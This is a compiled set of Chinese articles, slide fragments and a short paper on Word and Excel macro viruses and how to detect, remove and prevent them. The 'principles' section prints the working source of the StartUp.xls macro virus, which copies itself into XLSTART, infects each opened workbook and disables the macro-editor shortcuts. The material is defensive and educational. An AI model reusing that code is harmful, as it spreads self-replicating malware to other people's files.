宏病毒及其防治方法
关于Word宏病毒的处理方法
关于Word宏病毒的处理方法一、W97M.Lexar.B系列病毒现象:1、感染后的电脑,在保存Word文档时会弹出另存为对话框2、或提示在没有启用宏的文档中无法保存文件。
3、或提示文档存在二义性。
4、或发邮件时被退回,或收不到邮件。
5、导致OA编辑正文保存时出错、或保存不了正文、或无法盖章。
二、处理方法(必须严格遵守步骤处理):1、彻底关闭360杀毒。
2、删除“C:\Documents and Settings\(当前用户名)\Application Data\Microsoft\Templates”里面的模板文件。
3、下载最新的360杀毒软件:/indexbeta.html,安装并启动OFFICE病毒免疫。
三、具体处理步骤:1、关闭所有OFFICE文件。
2、显示隐藏的操作系统保护文件第一步:打开C盘选择“组织”,点击“文件夹和搜索选项”第二步:将隐藏文件选项按上图设置,确定第三步:在C盘找到“Documents and Settings”文件夹3、解除文件夹访问权限a)默认情况下“Documents and Settings”不可访问,需解除其访问权限b)解除步骤:第一步:右击“Documents and Settings”文件夹,选择属性,点击上图“高级”按钮第二步:打开高级安全设置选项卡,点击更改权限第三步:打开“更改高级权限设置”卡,选择图中的“拒绝”项,删除,确定4、进入文件夹逐级进入“C:\Documents and Settings\(当前用户名)\Application Data \Microsoft\Templates”文件夹,如遇到没有权限的文件夹则参照“3.3解除文件股权访问权限方法”解除权限。
5、删除文件夹内的所有文件文件删除后病毒即可删除。
6、启动新下载的360杀毒,下次打开有毒的文件时将会自动杀毒。
宏病毒原理及防范
宏病毒原理及防范一、常见宏病毒1.startup宏病毒宏病毒其实并不神秘,其工作原理是借用宏表4.0的auto_open事件启动病毒代码的复制和病毒文件的新建,新建的文件常放在xlsrt文件夹下。
然后利用xlstart文件夹文件可以自动启动的原理把病毒代码复制到新打开的excel文件中。
下面先看看startup宏病毒代码吧,注意红字部分。
Sub auto_open()On Error Resume NextIf ThisWorkbook.Path <> Application.StartupPath AndDir(Application.StartupPath & "\" & "StartUp.xls") = "" ThenApplication.ScreenUpdating = FalseThisWorkbook.Sheets("StartUp").CopyActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")n$ = ActiveWindow.Visible = FalseWorkbooks("StartUp.xls").SaveWorkbooks(n$).Close (False)End IfApplication.OnSheetActivate = "StartUp.xls!cop"Application.OnKey "%{F11}", "StartUp.xls!escape"Application.OnKey "%{F8}", "StartUp.xls!escape"End SubSub cop()On Error Resume NextIf ActiveWorkbook.Sheets(1).Name <> "StartUp" ThenApplication.ScreenUpdating = Falsen$ = Workbooks("StartUp.xls").Sheets("StartUp").Copybefore:=Worksheets(1)Sheets(n$).SelectEnd IfEnd Sub2.book1病毒book1病毒最明显的标志是打开excel时自动跳出一个book1空文件。
宏病毒
如果您并不希望在文档中包含宏,或者不了解文档的确切来源。例如,文档是作为电子邮件的附件收到的,或是来自网络或不安全的 Internet节点。在这种情况下,为了防止可能发生的病毒传染,打开文档过程中出现宏警告提示时最好选择“取消宏”。
2.制作、变种方便
以往病毒是以二进制的计算机机器码形式出现,而宏病毒则是以人们容易阅读的源代码宏语言WordBasic形式出现,所以编写和修改宏病毒比以往病毒更容易。世界上的宏病毒原型己有几十种,其变种与日俱增,追究其原因还是Word的开放性所致。现在的Word病毒都是用WordBasic语言所写成,大部分Word病毒宏并没有使用Word提供的Execute-Only处理函数处理,它们仍处于可打开阅读修改状态。所有用户在Word工具的宏菜单中很方便就可以看到这种宏病毒的全部面目。当然会有“不法之徒”利用掌握的Basic语句简单知识把其中病毒激活条件和破坏条件加以改变,立即就生产出了一种新的宏病毒,甚至比原病毒的危害更加严重。
起源
宏病毒起源 当病毒的先驱者们醉心于他们高超的汇编语言技术和成果时,可能不会想到后继者能以更加简单的手法制造影响力更大的病毒。Word宏病毒就是其中最具有代表性的范例之一。
其实宏病毒的出现并非出乎人们的意料,早在80年代后期就有专家预言过。那时,有些学生就用某些应用程序的宏语言编写病毒。然而,宏病毒与普通病毒不同,它不感染.EXE或.COM文件,而只感染文档文件。宏病毒就像自然界中令人恐惧的龙卷风,对人们正常使用计算机进行学习和工作带来了不可估量的影响,同时也造成了社会财富的巨大浪费。
鉴于绝大多数人都不需要或着不会使用“宏”这个功能,我们可以得出一个相当重要的结论:如果您的OFFICE文档在打开时,系统给出一个宏病毒警告框,那么您应该对这个文档保持高度警惕,它已被感染的几率极大。注意:简单地删除被宏病毒感染的文档并不能清除OFFICE系统中的宏病毒!
防御、清除Excel宏病毒的方法
防御、清除Excel宏病毒的方法
1、安装Office2007以上版本,如果使用Office2007以下版本的Execl禁用宏的操作与本文档
提供的方法有所区别,并且防御宏病毒的能力没有高版本强,所以推荐升级到Office2007以上版本。
2、禁用宏对宏病毒进行防御(如果使用到宏的功能请按照实际需求进行设置),具体方法
如下:
Excel选项->信任中心->信任中心设置->宏设置->禁用所有宏,并且不通知
3、手工删除Execl启动时自动打开的文件,查看Office安装目录XLSTART目录下是否存在有
文件(例:c:\Program Files\Microsoft Office\Office12\XLSTART\),如果存在文件并经过确认不是使用者设置的在Excle启动时自动打开的文件请将其删除。
4、清除现有文件中的宏病毒,使用专杀工具对所有分区进行扫描(Windows Vista以上版
本需要使用“以管理员身份运行”)。
MacroKiller.zip
如有问题请与信息工程部联系。
关于宏病毒的判断、清除和预防
关于宏病毒的判断、清除和预防关于宏病毒的判断、清除和预防2011年01月15日星期六下午01:09关于宏病毒的判断和预防前两天从EXCEL论坛里下载了一个帖子的附件(当然我认为该帖的发表人也不知道文件里有病毒),没想里面有宏病毒"StartUp.xls"在打开文件时提示,缺少"StartUp.xls"。
因为论坛里有很多附件是包含宏的,为了使用时方便,因此我EXCEL中关于宏安全性设置的是"低"。
没想到造成了大错,在此提醒各位一定要将EXCEL中"工具→宏→安全性→安全级"设置为中,打开文件时要确认该文件是否包含宏。
对于宏病毒的判断:当安全级选为中时,如果一旦发现自己的不包含宏的文件打开时提示该文件包含宏,那么恭喜你已经中招了。
此时一定要注意所有打开的文件(指WORD、EXCEL文件)不要存盘,因为宏病毒只有存盘后才会被感染,如果需要将文件进行保存,建议存储为TXT格式,然后从新进行排版。
一定要将打开的文件作好备份再进行杀毒。
我从昨日中午发现机器里被感染病毒,先后使用了"esetsmartsecurity""瑞星天空网站版""360杀毒软件最新版",但前两个软件均没有查出该病毒。
只有360查了出来并将病毒清除。
注意:在杀毒时不要选择"自动处理扫描出的病毒威胁"因为杀毒软件有可能会直接将文件删除,到时重要文件被删掉可是哭都来不及了,当其查出中毒文件后如是重要文件一定要将其重新存储为TXT格式,也可以使用XP自带的"写字板"(注意不是记事本)将word文件直接打开,并将内容保存下来,然后再交给杀毒软件处理。
这样就能保证文件内容不会丢失了。
excel宏病毒是怎么来的随着Internet在中国的迅速拓展,特别是中国教育和科研计算机网(CERNET)以及商业性的ChinaNet和COMNet的发展,电子邮件同样成为许多网络用户使用的工具,互联的校园网络在促进学校科研教育发展的同时,也非常容易成为网络攻击的对象,特别是在网络建设的初期,网络安全意识和网络防范能力都较为薄弱.据透露,一种新的致命病毒---Hare病毒定于近期"发作".Hare病毒届时将显示HDEuthanasia的信息,然后企图重写计算机硬盘上的全部文件.英国《病毒公报》编辑IanWhalley指出,Hare极为复杂,而且很难查出.它是借Internet传播的,未激活版本已在几个国家发现,其中包括美国.另外一种新病毒属于被称为"宏病毒"的传染病毒家族,宏病毒于一年前首次被发现.这种新病毒称为roux,是首例感染Microsoft公司Excell 电子表格的病毒.Laroux的表现很像目前常见的Word.concept病毒,后者在MicrosoftWord生成的文档中传播.Laroux可做为电子表格的附件进入电子邮件,或以其他同电子表格相同的传送方式传播.据美国全国计算机安全协会(NCSA)称,这种病毒相对来说没有什么危害,但可导致少数系统的"应用软件异常".NCSA指出,Laroux看上去比Word.concept传播的速度要慢,因为Excel不像Word使用那么广泛,而且用户不常共用电子表格,而文字处理器文档则经常共用.去年,用户经受的宏病毒猛增了5倍,安全专家把这主要归结为一个因素--电子邮件的迅速增加。
office如何有效预防宏病毒
Office如何有效预防宏病毒简介宏病毒是一种利用Microsoft Office软件中的宏功能传播的恶意软件。
宏病毒可以通过恶意宏代码来执行各种破坏行为,如破坏、删除或篡改文件。
在工作环境中,使用Microsoft Office软件是不可避免的。
然而,有效预防宏病毒的传播变得尤为重要。
本文将介绍一些有效的预防宏病毒的方法,帮助您保护您的数据和计算机安全。
方法一:启用安全设置Microsoft Office软件提供了一些内置的安全设置,可以帮助有效预防宏病毒的传播。
以下是一些重要的安全设置:1. 禁用自动宏运行默认情况下,Office软件启用自动宏运行。
禁用自动宏运行可以防止恶意宏在打开文档时自动执行。
要禁用自动宏运行,可以按照以下步骤操作:•在Office菜单中选择“选项”。
•在“信任中心”选项卡中,点击“信任中心设置”按钮。
•在“宏设置”中,选择“禁用所有宏,并禁用通知”选项。
2. 禁用宏如果您不需要使用宏功能,禁用宏是一种有效的预防宏病毒的办法。
要禁用宏,可以按照以下步骤操作:•在Office菜单中选择“选项”。
•在“信任中心”选项卡中,点击“信任中心设置”按钮。
•在“宏设置”中,选择“不允许任何宏运行”选项。
3. 启用受信任的位置有时,您可能需要运行特定的宏或从受信任的位置打开文档。
为了更好地控制宏的运行,可以将受信任的位置添加到Office软件的信任中心。
要启用受信任的位置,可以按照以下步骤操作:•在Office菜单中选择“选项”。
•在“信任中心”选项卡中,点击“信任中心设置”按钮。
•在“受信任的位置”中,点击“添加新位置”按钮。
方法二:保持软件升级定期升级Microsoft Office软件是预防宏病毒的另一个重要步骤。
每个Office升级都包含了最新的安全补丁和修复程序,可以提供额外的安全保障。
要确保软件始终保持最新状态,可以按照以下步骤操作:•打开Office软件,点击“文件”菜单。
宏病毒的查杀与防治
3
宏病毒的概念
什么是“宏”
宏就是一组计算机指令--可以将它们录制下
来,并将它们与快捷键组合或宏名称关联起来。
然后,在按下快捷键组合或单击宏名称时,计算
机程序就会执行宏的指令。
4
宏病毒的概念
“宏”在哪里?
我们工作当中,离不开各种文档、表格。比如 微软公司出品的办公软件office2003。当中有 word文档、有excel文档等等。这些高度智能化的 办公软件当中,有很多可以把复杂的反复操作简单 化的指令合集。这种合集可以是自己录制的,也可 以是网络下载的。这就是“宏”
14
宏病毒的查杀及预防
1、提高对宏病毒的警惕性 在office办公软件当中,在 工具—宏—安全性 选项当中把宏安全性设置为 高。 2、时刻保持杀毒软件的正常运行 把杀毒软件的更新设置为自动更新,打开杀毒软 件所有的杀毒选项 3、不要随意打开不明电子邮件 宏病毒寄存在文档当中,通过邮件及U盘拷贝等形 式传播。在收到不明来历的电子邮件,马上删除。例 如:邮件标题为人才调查、人才招聘、财务报表、公 司计划等不明来历具有诱惑性的邮件
5
宏病毒的概念
宏病毒的起源
宏病毒在上个世纪90年代得益于网络及电子邮件 的发展而广泛传播。宏病毒主要感染文件有 word、 Excel 的文档。并且会驻留在系统内存上。因为这种 病毒活动特征区别于电脑病毒,所以一般的杀毒软件 不会报警。只有在用户打开及保存以上两种文档时感 染文件。
6
宏病毒的识别
在杀毒过程中不要选择自动处理,因为这很可能 会把你的染毒文件直接删除。
查找出来的染毒文件如果是重要文档,先用系统
自带的写字板工具打开,保存内容后再清除病毒。 确保重要文档不丢失。
电脑宏病毒
电脑宏病毒宏病毒是一种寄存在文档或模板的宏中的计算机病毒。
下面由店铺带你走进宏病毒中!让你充分的了解宏病毒!谢谢!宏病毒:一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。
从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。
如果某个文档中包含了宏病毒,我们称此文档感染了宏病毒;如果WORD系统中的模板包含了宏病毒,我们称WORD系统感染了宏病毒。
来源虽然OFFICE97/Word97无法扫描软盘、硬盘或网络驱动器上的宏病毒。
但当打开一个含有可能携带病毒的宏的文档时,它能够显示宏警告信息。
并且在2013年后的杀毒软件已支持宏病毒扫描。
这样就可选择打开文档时是否要包含宏,如果希望文档包含要用到的宏(例如,单位所用的定货窗体),打开文档时就包含宏。
如果您并不希望在文档中包含宏,或者不了解文档的确切来源。
例如,文档是作为电子邮件的附件收到的,或是来自网络或不安全的Internet节点。
在这种情况下,为了防止可能发生的病毒传染,打开文档过程中出现宏警告提示时最好选择“取消宏”。
OFFICE97软件包安装后,系统中包含有关于宏病毒防护的选项,其默认状态是允许“宏病毒保护”复选框。
如果愿意,您可以终止系统对文档宏病毒的检查。
当Word显示宏病毒警告信息时,清除“在打开带有宏或自定义内容的文档时提问”复选框。
或者关闭宏检查:单击“工具”菜单中的“选项”命令,再单击“常规”选项卡,然后清除“宏病毒保护”复选框。
不过我强烈建议您不要取消宏病毒防护功能,否则您会失去这道防护宏病毒的天然屏障。
上世纪90年代的宏病毒主要感染文件有word、Excel 的文档。
并且会驻留在Normal面板上据统计,通过Internet传播的不同类型的病毒数量如下:DOS型: 10000至11000种Windows型:12种Macintosh型:35种宏病毒: 200余种Unix型: 6种其中10000-11000种DOS型病毒能感染所有DOS、Windows95平台的计算机(但不感染Macintosh计算机);但200余种宏病毒中的大部分能感染所有计算机,包括PC机和Macintosh机。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
宏病毒及其防治方法探析
摘要:宏病毒的出现对办公软件的安全使用带来了极大的威胁,故文章在深入研究宏病毒作用机制的基础上,从发现病毒、清除病毒以及预防病毒三个方面对其防治方法进行了探析,以供参考。
关键词:宏病毒作用机制防治方法
前言:微软公司的microsoft word 几乎已经成为目前全世界办公文档的事实工业标准,而宏病毒就是是针对的字处理软件word 编写的一种病毒,其种类达数百种,危害日甚一日,感染率高达40%以上,已成为威胁计算机信息系统安全的主要因素。
因此,对其作用机制进行深入研究,制定切实有效的防治方法,从而最大限度地降低病毒带来的危害是十分必要的。
1.宏病毒的作用机制
word 的文件建立是通过模板来创建的,模板是为了形成最终文档而提供的特殊文档,模板可以包括以下几个元素: 菜单、宏、格式( 如备忘录等)。
word 处理文档需要同时进行各种不同的动作,如打开文件、关闭文件、读取数据资料以及储存和打印等等。
每一种动作其实都对应着特定的宏命令。
通常,word 宏病毒至少会包含一个以上的自动宏( 如autoopen、autoclose、autoexec、autoexit和autonew 等) ,或者是一个以上的标准宏,如fileopen、filesaveas等。
如果某个.doc 文件感染了这类word 宏病毒,则当word 运行这类自动宏时,实际上就是运行了病毒代码。
一旦病毒宏侵入word 系统,它就会替
代原有的正常宏,如fileopen、filesave、filesaveas 和fileprint 等,并通过这些宏所关联的文件操作功能获取对文件交换的控制。
当某项功能被调用时,相应的病毒宏就会篡夺控制权,实施病毒所定义的非法操作,包括传染操作、表现操作以及破坏操作等。
宏病毒主要寄生于autoopen、autoclose 和autonew 3 个宏中,其引导、传染、表现或破坏均通过宏指令来完成的。
宏指令是用宏语言word basic 编写的,宏语言提供了许多系统级底层功能调用,因此,宏病毒利用宏语言实现其传染、表现或破坏的目的。
目前,几乎所有已知的宏病毒都沿用了相同的作用机理,即如果word 系统在读取一个染毒文件时遭受感染,则其后所有新创建的doc 文件都会被感染。
word 宏病毒几乎是唯一可跨越不同硬件平台而生存、传染和流行的一类病毒。
同时,由于word 允许对宏本身进行加密操作,因此有许多宏病毒是经过加密处理的,不经过特殊处理是无法进行编辑或观察的,这也是很多宏病毒无法手工杀除的主要原因。
2.宏病毒防治方法
2.1 发现word 宏病毒
尽管宏病毒的破坏性较大,而且具有一定的隐蔽性,采用常规的文件型病毒判定方法不能判断宏病毒的存在。
但根据宏病毒的传染机制,不难看出宏病毒传染中的特点。
所以通过以下方法可简单地判断某文档是否感染了宏病毒。
(1)在使用的word 中打开宏菜单,点中normal 模板,若发
现有autoopen、autonew、autoclose 等自动宏以及filesave、filesaveas、fileexit 等文件操作宏或一些怪名字的宏,如aaazao、payload 等,而自己又没有加载特殊模板,这就极可能是病毒在作祟了,因为大多数normal 模板中是不包含上述宏的。
(2)如发现打开一个文档,它未经任何改动,立即提示存盘操作,也有可能是word 带有病毒。
(3)打开以.doc 为后缀的文件在另存菜单中只能以模板方式存盘,而此时通用模板中含有宏,也有可能是word 有病毒。
2.2 清除word 宏病毒
清除宏病毒有两种方法,即手工清除和用杀毒工具清除:
(1)手工清除宏病毒
手工清除宏病毒步骤:①打开宏菜单,在通用模板中删除您认为是病毒的宏;②打开带有病毒宏的文档(模板) ,然后打开宏菜单,在通用模板和病毒文件名模板中删除您认为是病毒的宏;③保存清洁文档;④对剩余文件重复步骤①~③。
手工清除宏病毒有一定难度,而且不彻底,最好还是用杀毒软件清除安全可靠。
(2)用杀毒工具自动清除宏病毒
用杀毒工具自动清除宏病毒是理想的解决办法。
目前反病毒软件都具有对已知宏病毒杀除的功能,而且有的软件还能对未知病毒报警。
2.3 预防宏病毒
从宏病毒的特性和传播途径看,预防宏病毒的方法应从以下方面入手:
(1)对于已染病毒的文件首先应将normal .dot 中的自动宏清除( autoopen、auto-close、autonew) ,然后将normal .dot 置成只读方式。
(2)对于其他已染毒的文件均应将自动宏清除,这样就可以达到清除病毒的目的。
(3)平时使用时要加强预防。
对来历不明的宏最好予以删除。
如果发现后缀为.doc的文件变成模板时,则可怀疑其已染宏病毒,其主要表现是在saveas 文档时,选择文件类型的框变为灰色。
(4)在打开文件时,按住sh ift 键可以阻止自动宏的运行。
例如,当您用含有autonew宏的模板新建一个文档时,在“新建”对话框(“文件”菜单) 中单击“确定”按钮时按住shift 键,就可以阻止autonew 宏的执行。
您要按住shift 键直到新文档显示在窗口中。
在可以触发自动宏的宏中,您可以用disable auto macros 阻止运行自动宏。
(5)安装反病毒软件,启用实时反病毒功能,检查外来病毒包括int ernet、bbs 病毒对系统的入侵。
只有检查后,方可使用。
参考文献:
[1]王素芳.《word宏病毒简析》.科技信息(科学教研),2008
[2]梁玲.《宏病毒感染过程及防范措施研究》.科技情报开发与经济,2009
[3]高永仁.《预防和清除宏病毒的方法》.网络安全技术与应用,2007
[4]孙领弟,马彦芬.《word宏病毒的产生和清除方法》.河北工程技术高等专科学校学报,2002
[5]刘兴权.《关于word宏病毒的分析与防治》.山西电子技术,2001。